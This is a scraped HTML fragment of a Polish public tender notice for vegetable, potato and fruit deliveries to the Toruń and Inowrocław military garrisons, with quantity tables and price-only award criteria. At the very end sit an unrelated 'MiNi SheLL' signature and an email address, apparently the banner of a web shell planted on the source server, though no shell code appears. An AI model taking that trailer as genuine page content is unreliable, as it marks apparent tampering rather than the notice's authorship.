dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-11-04</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa warzyw i ziemniaków dla Garnizonu Toruń</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest: Dostawa warzyw i owoców w asortymencie i ilościach podanych w ust. 7.2.	Szczegółowe wymogi odnośnie przedmiotu zamówienia zawarto w niniejszym SIWZ i w załącznikach:2.1. Nr od 1.1. do 1.55. Opis przedmiotu zamówienia;2.2.	Nr 5 Projekt umowy.3.	Przedmiot zamówienia został podzielony na cztery części:3.1.	Część 1 – Dostawa warzyw i ziemniaków dla Garnizonu Toruń;4.	Wykonawca może złożyć jedną ofertę na wszystkie lub na wybrane części.5.	Zamawiający zastrzega sobie prawo do weryfikacji zgodności norm jakościowych dostarczanych produktów z jakością ustaloną w niniejszym SIWZ i w oparciu o:5.1.	PN-R-74456 Rośliny okopowe - Badanie jakości ziemniaków;5.2.	PN-R-75356 Warzywa świeże – Badanie jakości;5.3.	PN-R-75021 Owoce świeże - Badanie jakości.6.	Prawo do weryfikacji zgodności norm, o którym mowa w ust. 5 przysługuje (tj. pobrania prób i badania dostarczonego towaru) w imieniu Zamawiającego przysługuje właściwemu miejscowo dla Zamawiającego lub Odbiorcy akredytowanemu laboratorium lub laboratorium spełniającemu wymagania normy PN-EN ISO/IEC 17025.7.	Szczegółowy zakres dostaw owoców i warzyw dla poszczególnych częściach zamówienia:7.1.	Część 1 – Dostawa warzyw i ziemniaków dla Garnizonu Toruń:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Ziemniaki wczesne	kg	1 000	500	5002.	Buraki ćwikłowe	kg	4 600	2 300	2 3003.	Marchew	kg	9 800	5 400	4 400a	b	c	d	e	f4.	Pietruszka korzeniowa	kg	2 900	1 450	1 4505.	Seler korzeniowy	kg	4 800	2 400	2 4006.	Cebula	kg	6 800	3 400	3 4007.	Cebula czerwona	kg	300	150	1508.	Por	kg	3 900	1 950	1 9509.	Kapusta biała	kg	5 500	2 750	2 75010.	Kapusta czerwona	kg	2 500	1 250	1 25011.	Czarna rzepa	kg	500	250	25012.	Fasola szparagowa	kg	400	200	20013.	Papryka słodka	kg	2 200	1 250	95014.	Pomidory	kg	3 600	2 050	1 55015.	Pomidorki cherry	kg	140	70	7016.	Ogórki	kg	4 000	2 000	2 00017.	Sałata kg	740	370	37018.	Sałata lodowa	kg	850	425	42519.	Sałata karbowana	kg	60	30	3020.	Roszponka	kg	30	15	1521.	Cykoria	kg	60	30	3022.	Rukola	kg	70	35	3523.	Brokuły	kg	600	300	30024.	Kapusta włoska	kg	400	200	20025.	Kapusta pekińska	kg	1 900	950	95026.	Kapusta brukselska	kg	580	290	29027.	Kalafior	kg	1 400	700	70028.	Rzodkiewka	kg	780	390	39029.	Rabarbar	kg	200	100	10030.	Natka pietruszki	kg	320	160	160a	b	c	d	e	f31.	Koperek zielony	kg	400	200	20032.	Szczypiorek	kg	280	140	14033.	Botwina	kg	260	130	13034.	Kiełki rzodkiewki	kg	8	4	435.	Kiełki słonecznika	kg	8	4	436.	Czosnek	kg	180	90	9037.	Pieczarki kg	1400	700	70038.	Cukinia	kg	200	100	10039.	Bakłażan	kg	70	35	3540.	Szparagi	kg	70	35	35<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03221000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-01<br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa owoców dla Garnizonu Toruń</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest: Dostawa warzyw i owoców w asortymencie i ilościach podanych w ust. 7.2.	Szczegółowe wymogi odnośnie przedmiotu zamówienia zawarto w niniejszym SIWZ i w załącznikach:2.1. Nr od 1.1. do 1.55. Opis przedmiotu zamówienia;2.2.	Nr 5 Projekt umowy.3.	Przedmiot zamówienia został podzielony na cztery części:Część 2 – Dostawa owoców dla Garnizonu Toruń;4.	Wykonawca może złożyć jedną ofertę na wszystkie lub na wybrane części.5.	Zamawiający zastrzega sobie prawo do weryfikacji zgodności norm jakościowych dostarczanych produktów z jakością ustaloną w niniejszym SIWZ i w oparciu o:5.1.	PN-R-74456 Rośliny okopowe - Badanie jakości ziemniaków;5.2.	PN-R-75356 Warzywa świeże – Badanie jakości;5.3.	PN-R-75021 Owoce świeże - Badanie jakości.6.	Prawo do weryfikacji zgodności norm, o którym mowa w ust. 5 przysługuje (tj. pobrania prób i badania dostarczonego towaru) w imieniu Zamawiającego przysługuje właściwemu miejscowo dla Zamawiającego lub Odbiorcy akredytowanemu laboratorium lub laboratorium spełniającemu wymagania normy PN-EN ISO/IEC 17025.7.	Szczegółowy zakres dostaw owoców i warzyw dla poszczególnych częściach zamówienia7.1. Część 2 – Dostawa owoców dla Garnizonu Toruń:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Banany	kg	4 300	2 400	19002.	Cytryny	kg	1 600	800	8003.	Pomarańcze	kg	3 300	1 650	16504.	Mandarynki	kg	2 100	1 050	10505.	Grejpfruty	kg	600	300	3006.	Arbuz	kg	160	80	807.	Kiwi	kg	1 300	650	6508.	Morele	kg	740	370	3709.	Brzoskwinie	kg	900	450	45010.	Winogrona	kg	300	150	15011.	Jabłka	kg	11 600	5 800	5 800a	b	c	d	e	f12.	Gruszki	kg	3 800	2 150	1 65013.	Mango	kg	110	55	5514.	Ananas	kg	70	35	3515.	Nektarynki	kg	1 600	800	800<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03222000-3, 03222110-7, 03222200-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-01<br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawa warzyw i ziemniaków dla Garnizonu Inowrocław</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest: Dostawa warzyw i owoców w asortymencie i ilościach podanych w ust. 7.2.	Szczegółowe wymogi odnośnie przedmiotu zamówienia zawarto w niniejszym SIWZ i w załącznikach:2.1. Nr od 1.1. do 1.55. Opis przedmiotu zamówienia;2.2.	Nr 5 Projekt umowy.3.	Przedmiot zamówienia został podzielony na cztery części:Część 3 – Dostawa warzyw i ziemniaków dla Garnizonu Inowrocław;4.	Wykonawca może złożyć jedną ofertę na wszystkie lub na wybrane części.5.	Zamawiający zastrzega sobie prawo do weryfikacji zgodności norm jakościowych dostarczanych produktów z jakością ustaloną w niniejszym SIWZ i w oparciu o:5.1.	PN-R-74456 Rośliny okopowe - Badanie jakości ziemniaków;5.2.	PN-R-75356 Warzywa świeże – Badanie jakości;5.3.	PN-R-75021 Owoce świeże - Badanie jakości.6.	Prawo do weryfikacji zgodności norm, o którym mowa w ust. 5 przysługuje (tj. pobrania prób i badania dostarczonego towaru) w imieniu Zamawiającego przysługuje właściwemu miejscowo dla Zamawiającego lub Odbiorcy akredytowanemu laboratorium lub laboratorium spełniającemu wymagania normy PN-EN ISO/IEC 17025.7.	Szczegółowy zakres dostaw owoców i warzyw dla poszczególnych częściach zamówienia:7.3.	Część 3 – Dostawa warzyw i ziemniaków dla Garnizonu Inowrocław:l.p.	Nazwa produktu	j.m.	Zakres zamówienia Maksymalny	Podstawowy	Dodatkowya	b	c	d	e	f1.	Ziemniaki wczesne	kg	400	200	2002.	Buraki ćwikłowe	kg	2 000	1 000	1 0003.	Marchew	kg	3 500	2 000	1 5004.	Pietruszka korzeniowa	kg	1 000	500	5005.	Seler korzeniowy	kg	2 000	1 000	1 0006.	Cebula	kg	3 000	1 500	1 5007.	Cebula czerwona	kg	200	100	1008.	Por	kg	1 000	600	4009.	Kapusta biała	kg	3 000	1 500	1 50010.	Kapusta czerwona	kg	1 000	500	50011.	Czarna rzepa	kg	200	100	10012.	Fasola szparagowa	kg	300	150	15013.	Papryka słodka	kg	1 000	500	50014.	Pomidory	kg	1 500	750	75015.	Pomidorki cherry	kg	300	150	15016.	Ogórki	kg	1 700	1 000	70017.	Sałata kg	400	200	20018.	Sałata lodowa	kg	400	200	20019.	Sałata karbowana	kg	20	10	10a	b	c	d	e	f20.	Roszponka	kg	40	20	2021.	Cykoria	kg	20	10	1022.	Rukola	kg	40	20	2023.	Brokuły	kg	600	300	30024.	Kapusta włoska	kg	200	100	10025.	Kapusta pekińska	kg	1 000	500	50026.	Kapusta brukselska	kg	500	250	25027.	Kalafior	kg	600	300	30028.	Rzodkiewka	kg	100	50	5029.	Rabarbar	kg	200	100	10030.	Natka pietruszki	kg	200	100	10031.	Koperek zielony	kg	200	100	10032.	Szczypiorek	kg	100	50	5033.	Botwina	kg	60	30	3034.	Kiełki rzodkiewki	kg	4	2	235.	Kiełki słonecznika	kg	4	2	236.	Czosnek	kg	100	50	5037.	Pieczarki kg	1200	600	60038.	Cukinia	kg	100	50	5039.	Bakłażan	kg	10	5	540.	Szparagi	kg	50	25	25<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03221000-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-01<br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com